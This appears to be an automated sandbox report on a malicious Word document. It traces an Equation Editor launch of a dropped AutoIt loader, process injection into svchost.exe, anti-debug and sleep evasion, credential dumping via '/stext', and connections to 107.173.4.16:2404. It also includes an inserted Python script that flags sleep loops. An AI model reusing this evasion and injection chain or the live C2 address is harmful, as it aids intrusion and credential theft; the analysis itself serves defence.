Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040F7E2 Sleep,ExitProcess, 7_2_0040F7E2
Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 5E3244
Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 133244
Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 7_2_0041A7D9
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 9813 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\taskhostw.exe API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.9 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3404 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 164 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -492000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3656 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 9813 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -29439000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3776 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3940 Thread sleep time: -120000s >= -30000s Jump to behavior
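The thread-sleep lines above are worth reading together rather than one at a time. Thread 3604 of svchost.exe appears twice with both counters growing (164 calls / 492000, then 9813 calls / 29439000), and in both snapshots the ratio is exactly 3000 per call: a fixed-interval sleep loop, which is the stalling pattern the "threadDelayed 9813" line records. The script below, an added example rather than part of the report, parses these lines, treats the repeated counters as cumulative snapshots and keeps the maximum per thread (an assumption about the report format, supported by the equal ratios), then flags threads against the same thresholds the report prints (30000 total, 30 calls). The sign and the "s" unit are reproduced as the report prints them; the magnitudes (29439000 for 9813 calls) suggest milliseconds, that is roughly 3 s per Sleep call and about 8 hours in total, but that is an inference, not something the page states.

```python
import re

SLEEP_RE = re.compile(
    r'^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep '
    r'(?P<kind>count|time): -?(?P<value>\d+)s? (?:>|>=) -?\d+s?'
)

# Constructed sample input: the thread-sleep lines copied from this report.
SAMPLE_SLEEP_LINES = r"""
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3404 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 164 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -492000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3656 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep count: 9813 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604 Thread sleep time: -29439000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3776 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3940 Thread sleep time: -120000s >= -30000s Jump to behavior
"""


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def summarize_sleeps(report):
    """Per (image, tid): largest call count and largest total sleep seen, plus time per call.

    The report emits the counters at several points and they only grow, so they are
    treated as cumulative snapshots and the maximum is kept (assumption about the format).
    """
    per_thread = {}
    for line in report.splitlines():
        m = SLEEP_RE.match(line.strip())
        if not m:
            continue
        key = (basename(m["image"]), int(m["tid"]))
        entry = per_thread.setdefault(key, {"count": 0, "time": 0})
        entry[m["kind"]] = max(entry[m["kind"]], int(m["value"]))
    for entry in per_thread.values():
        entry["per_call"] = entry["time"] // entry["count"] if entry["count"] else None
    return per_thread


def flag_sleep_evasion(per_thread, time_threshold=30000, count_threshold=30):
    """Threads exceeding the report's own thresholds, each with the reasons it was flagged."""
    flagged = {}
    for key, e in per_thread.items():
        reasons = []
        if e["time"] >= time_threshold:
            reasons.append("long total sleep")
        if e["count"] > count_threshold:
            reasons.append("sleep loop")              # many calls at a fixed interval = stalling
        if reasons:
            flagged[key] = reasons
    return flagged


if __name__ == "__main__":
    summary = summarize_sleeps(SAMPLE_SLEEP_LINES)
    for key, reasons in flag_sleep_evasion(summary).items():
        print(key, summary[key], reasons)
```

The per-call figure is the useful output: a constant interval across snapshots distinguishes a deliberate delay loop from a process that merely blocks once, and it is also the number to feed a sandbox's sleep-skipping configuration when re-running the sample.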
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C75D FindFirstFileW,FindClose, 5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F021
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose, 6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC75D FindFirstFileW,FindClose, 6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407877 FindFirstFileW,FindNextFileW, 7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044E8F9 FindFirstFileExA, 7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10006580 FindFirstFileExA, 7_2_10006580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 7_2_00407CD2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00CF4AFE
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: C:\Users\user\AppData\Roaming\taskhostw.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6401F BlockInput, 5_2_00D6401F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00CF3B4C
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_013C5BFC
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress, 5_2_00D6C104
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FF2 mov edx, dword ptr fs:[00000030h] 2_2_00683FF2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E34B0 mov eax, dword ptr fs:[00000030h] 6_2_005E34B0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E3510 mov eax, dword ptr fs:[00000030h] 6_2_005E3510
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E1E70 mov eax, dword ptr fs:[00000030h] 6_2_005E1E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00443355 mov eax, dword ptr fs:[00000030h] 7_2_00443355
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h] 7_2_10004AB4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D481D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00D481D4
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00D1A2D5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1A2A4 SetUnhandledExceptionFilter, 5_2_00D1A2A4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BA2A4 SetUnhandledExceptionFilter, 6_2_013BA2A4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_013BA2D5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00434BD8 SetUnhandledExceptionFilter, 7_2_00434BD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_0043503C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00434A8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0043BB71
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_100060E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002B1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10002639

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 107.173.4.16 2404
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 178.237.33.50 80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 7_2_0041812A
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 7_2_00412132
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48A73 LogonUserW, 5_2_00D48A73
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00CF3B4C
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00CF4A35
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D54CCE mouse_event, 5_2_00D54CCE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D481D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00D481D4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D54A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 5_2_00D54A08
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: taskhostw.exe, name.exe Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA7BAB cpuid 5_3_02AA7BAB
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_0045201B
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_004520B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_00452143
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_00452393
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_00448484
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_004524BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_004525C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_00452690
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_0044896D
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoA, 7_2_0040F90C
Source: C:\Windows\SysWOW64\svchost.exe Code function: IsValidCodePage,GetLocaleInfoW, 7_2_00451D58
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_00451FD0
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
